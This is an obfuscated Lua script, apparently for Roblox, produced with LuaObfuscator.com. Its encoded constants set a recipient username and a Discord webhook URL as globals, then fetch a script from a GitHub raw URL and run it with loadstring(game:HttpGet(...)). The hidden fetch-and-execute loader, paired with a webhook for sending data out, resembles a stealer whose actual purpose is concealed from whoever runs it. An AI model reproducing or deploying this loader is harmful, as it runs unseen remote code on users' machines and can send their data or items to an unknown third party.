--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (v71==0) then v19=v0(v3(v30,1,1));return "";end end else local v72=v2(v0(v30,16));if v19 then local v82=0;local v83;while true do if (v82==1) then return v83;end if (v82==0) then v83=v5(v72,v19);v19=nil;v82=1;end end else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v73-(v73%(932 -(857 + 74))) ;else local v74=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and 1) or (0 + 0) ;end end local function v21()local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==((1271 -(226 + 1044)) + 0)) then return v35;end if (v34==(0 -(0 -0))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1066 -(68 + 997) ;end end end local function v22()local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==((351 -(87 + 263)) + (180 -(67 + 113)))) then return (v38 * (57 + 146 + 53)) + v37 ;end if (v36==(957 -(892 + 65))) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v36=(2 -1) -0 ;end end end local function v23()local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(3 -2)) then return (v43 * 16777216) + (v42 * (66488 -(802 + 150))) + (v41 * 256) + v40 ;end if ((0 -(0 -0))==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 + 0 ;v39=(1311 -313) -(915 + 82) ;end end end local function v24()local v44=1187 -(1069 + 118) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(2 -1)) then v47=1;v48=(v20(v46,1 -(859 -(814 + 45)) ,4 + 16 ) * ((3 -1)^((78 -46) + 0 + 0))) + v45 ;v44=793 -(368 + 150 + 273) ;end if (3==v44) then if (v49==(0 -0)) then if (v48==(18 -(10 + 8))) then return v50 * ((885 -(261 + 624)) -0) ;else v49=443 -(416 + 26) ;v47=0 -0 ;end elseif (v49==(879 + 1168)) then return ((v48==0) and (v50 * ((1 -(0 -0))/(438 -(145 + 293))))) or (v50 * NaN) ;end return v8(v50,v49-(1453 -(44 + 386)) ) * (v47 + (v48/(2^(1538 -(998 + 488))))) ;end if (v44==(0 + 0)) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==((1854 -(1020 + 60)) -((1624 -(630 + 793)) + 571))) then v49=v20(v46,1159 -(116 + 1022) ,31);v50=((v20(v46,133 -101 )==(1 + 0)) and  -((9 -6) -2)) or 1 ;v44=10 -7 ;end end end local function v25(v51)local v52;if  not v51 then local v75=0 -(0 -0) ;while true do if (v75==(0 -(0 -0))) then v51=v23();if (v51==(0 + 0)) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -(767 -(745 + 21)) );v18=v18 + v51 ;local v53={};for v69=1 + 0 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==(1 + 0)) then local v76=0 + 0 ;while true do if (v76==(529 -(406 + 123))) then v57=nil;v58=nil;v76=1770 -(1749 + 20) ;end if (v76==1) then v54=2;break;end end end if (v54~=0) then else local v77=0;while true do if (v77==1) then v54=1;break;end if (0==v77) then local v102=0 + 0 ;while true do if (v102==1) then v77=1;break;end if (v102~=(1322 -(1249 + 73))) then else v55=0 + 0 ;v56=nil;v102=1146 -(466 + 679) ;end end end end end if ((4 -2)~=v54) then else local v78=0 -0 ;while true do if (v78~=0) then else v59=nil;v60=nil;v78=1;end if (v78==(1901 -(106 + 1794))) then v54=3;break;end end end if (v54~=3) then else v61=nil;while true do local v84=0 + 0 ;local v85;while true do if (0~=v84) then else v85=0 + 0 ;while true do if (v85==0) then local v109=0;local v110;while true do if (0~=v109) then else v110=0;while true do if (v110~=(2 -1)) then else v85=2 -1 ;break;end if (v110==0) then if (v55==0) then local v153=0;local v154;while true do if (v153==(114 -(4 + 110))) then v154=0;while true do if (v154~=0) then else v56={};v57={};v154=585 -(57 + 527) ;end if ((1428 -(41 + 1386))==v154) then v58={};v55=104 -(17 + 86) ;break;end end break;end end end if ((1 + 0)~=v55) then else local v155=0;local v156;while true do if (v155==0) then v156=0 -0 ;while true do if (v156~=(0 -0)) then else local v165=166 -(122 + 44) ;local v166;while true do if (0==v165) then v166=0 -0 ;while true do if (v166==0) then local v170=0 -0 ;while true do if (v170==0) then v59={v56,v57,nil,v58};v60=v23();v170=1;end if (v170==(66 -(30 + 35))) then v166=1;break;end end end if (v166~=(1 + 0)) then else v156=1258 -(1043 + 214) ;break;end end break;end end end if (v156==(3 -2)) then v61={};v55=1214 -(323 + 889) ;break;end end break;end end end v110=1;end end break;end end end if (v85~=1) then else if (v55==2) then local v111=0;local v112;local v113;while true do if (v111~=1) then else while true do if (v112==0) then v113=0 -0 ;while true do if (v113==(580 -(361 + 219))) then local v159=320 -(53 + 267) ;local v160;while true do if (v159==(0 + 0)) then v160=413 -(15 + 398) ;while true do if (v160~=(983 -(18 + 964))) then else v113=3 -2 ;break;end if (v160==0) then local v169=0 + 0 ;while true do if (v169==(1 + 0)) then v160=1;break;end if ((850 -(20 + 830))==v169) then for v178=1 + 0 ,v60 do local v179=0;local v180;local v181;while true do if (v179~=0) then else local v182=126 -(116 + 10) ;while true do if (v182==(1 + 0)) then v179=739 -(542 + 196) ;break;end if (v182==(0 -0)) then local v186=0 + 0 ;while true do if (v186~=(1 + 0)) then else v182=1;break;end if ((0 + 0)~=v186) then else v180=v21();v181=nil;v186=1;end end end end end if (1~=v179) then else if (v180==1) then v181=v21()~=0 ;elseif (v180==2) then v181=v24();elseif (v180==3) then v181=v25();end v61[v178]=v181;break;end end end v59[7 -4 ]=v21();v169=1;end end end end break;end end end if (v113==(2 -1)) then for v161=1,v23() do local v162=1551 -(1126 + 425) ;local v163;local v164;while true do if (v162~=(406 -(118 + 287))) then else while true do if (0==v163) then v164=v21();if (v20(v164,1,1)~=(0 -0)) then else local v172=0;local v173;local v174;local v175;local v176;local v177;while true do if (v172==(1122 -(118 + 1003))) then v175=nil;v176=nil;v172=5 -3 ;end if ((377 -(142 + 235))==v172) then v173=0;v174=nil;v172=1;end if (v172==(9 -7)) then v177=nil;while true do if (v173==2) then while true do if (v174==(1 + 2)) then if (v20(v176,3,980 -(553 + 424) )~=(1 -0)) then else v177[4 + 0 ]=v61[v177[4]];end v56[v161]=v177;break;end if (v174==(2 + 0)) then local v188=0;local v189;while true do if ((0 + 0)==v188) then v189=0 + 0 ;while true do if (v189~=0) then else local v198=0;while true do if (v198~=0) then else if (v20(v176,1 + 0 ,1)~=(2 -1)) then else v177[2]=v61[v177[5 -3 ]];end if (v20(v176,4 -2 ,2)~=(1 + 0)) then else v177[3]=v61[v177[14 -11 ]];end v198=1;end if ((754 -(239 + 514))~=v198) then else v189=1 + 0 ;break;end end end if (v189==1) then v174=1332 -(797 + 532) ;break;end end break;end end end if (v174==0) then local v190=0;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191~=(0 + 0)) then else v175=v20(v164,2,2 + 1 );v176=v20(v164,4,6);v191=2 -1 ;end if (v191==(1203 -(373 + 829))) then v174=732 -(476 + 255) ;break;end end break;end end end if (v174==(1131 -(369 + 761))) then local v192=0;while true do if (v192==1) then v174=2;break;end if (v192==0) then local v197=0;while true do if (v197==1) then v192=1 + 0 ;break;end if (v197==0) then v177={v22(),v22(),nil,nil};if (v175==(0 + 0)) then local v199=0;local v200;while true do if (v199~=(0 -0)) then else v200=336 -(144 + 192) ;while true do if (0==v200) then v177[219 -(42 + 174) ]=v22();v177[4]=v22();break;end end break;end end elseif (v175==1) then v177[3]=v23();elseif (v175==2) then v177[3 + 0 ]=v23() -((2 + 0)^16) ;elseif (v175==(2 + 1)) then local v209=0;while true do if (v209==0) then v177[1507 -(363 + 1141) ]=v23() -((1582 -(1183 + 397))^16) ;v177[4]=v22();break;end end end v197=1;end end end end end end break;end if (v173~=1) then else local v184=0 -0 ;while true do if (1==v184) then v173=2 + 0 ;break;end if (v184==(0 + 0)) then local v193=1975 -(1913 + 62) ;while true do if (1~=v193) then else v184=1 + 0 ;break;end if ((0 -0)==v193) then v176=nil;v177=nil;v193=1934 -(565 + 1368) ;end end end end end if (v173==(0 -0)) then local v185=0;while true do if (v185==0) then local v194=1661 -(1477 + 184) ;while true do if ((1 -0)==v194) then v185=1 + 0 ;break;end if (v194~=0) then else v174=856 -(564 + 292) ;v175=nil;v194=1 -0 ;end end end if (v185==(2 -1)) then v173=1;break;end end end end break;end end end break;end end break;end if (v162~=(304 -(244 + 60))) then else v163=0 + 0 ;v164=nil;v162=1;end end end v55=479 -(41 + 435) ;break;end end break;end end break;end if (v111~=(1001 -(938 + 63))) then else v112=0;v113=nil;v111=1;end end end if (v55==3) then local v114=0;local v115;while true do if (v114~=(0 + 0)) then else v115=1125 -(936 + 189) ;while true do if (v115==(0 + 0)) then local v157=1613 -(1565 + 48) ;local v158;while true do if (v157~=0) then else v158=0 + 0 ;while true do if (0==v158) then for v167=1139 -(782 + 356) ,v23() do v57[v167-1 ]=v28();end return v59;end end break;end end end end break;end end end break;end end break;end end end break;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v86=v66;local v87=v67;local v88=v68;local v89=v27;local v90=1;local v91= -1;local v92={};local v93={...};local v94=v12("#",...) -1 ;local v95={};local v96={};for v100=0,v94 do if (v100>=v88) then v92[v100-v88 ]=v93[v100 + 1 ];else v96[v100]=v93[v100 + 1 ];end end local v97=(v94-v88) + 1 ;local v98;local v99;while true do local v101=0;while true do if (v101==0) then v98=v86[v90];v99=v98[1];v101=1;end if (v101==1) then if (v99<=4) then if (v99<=1) then if (v99==0) then local v116=0;local v117;local v118;while true do if (v116==0) then v117=v98[2];v118=v96[v98[3]];v116=1;end if (v116==1) then v96[v117 + 1 ]=v118;v96[v117]=v118[v98[4]];break;end end else local v119;local v120;v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]][v98[3]]=v98[4];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]][v98[3]]=v98[4];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]][v98[3]]=v98[4];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v64[v98[3]];v90=v90 + 1 ;v98=v86[v90];v120=v98[2];v119=v96[v98[3]];v96[v120 + 1 ]=v119;v96[v120]=v119[v98[4]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];end elseif (v99<=2) then v96[v98[2]]();elseif (v99==3) then v96[v98[2]]=v98[3];else do return;end end elseif (v99<=6) then if (v99==5) then local v132=v98[2];v96[v132]=v96[v132](v13(v96,v132 + 1 ,v91));else local v134=v98[2];local v135,v136=v89(v96[v134](v13(v96,v134 + 1 ,v98[3])));v91=(v136 + v134) -1 ;local v137=0;for v140=v134,v91 do v137=v137 + 1 ;v96[v140]=v135[v137];end end elseif (v99<=7) then v96[v98[2]][v98[3]]=v98[4];elseif (v99>8) then v96[v98[2]]=v64[v98[3]];else v96[v98[2]]=v98[3]~=0 ;end v90=v90 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030B3O0020326B72692O7A792O582003093O00557365724E616D653203073O00576562682O6F6B037B3O0020682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O3033373836303236333933313936352F30354F6A4E436B622O414A5F574B6E61776E36373544452D717A30485F4278797A504C744D2D52454C5439695F33306C424D4E7A7459793845527A4F4C7A5F793237426B20030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012013O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A4O0008000400014O0006000100044O00055O00022O00023O000100012O00043O00017O00",v9(),...);end
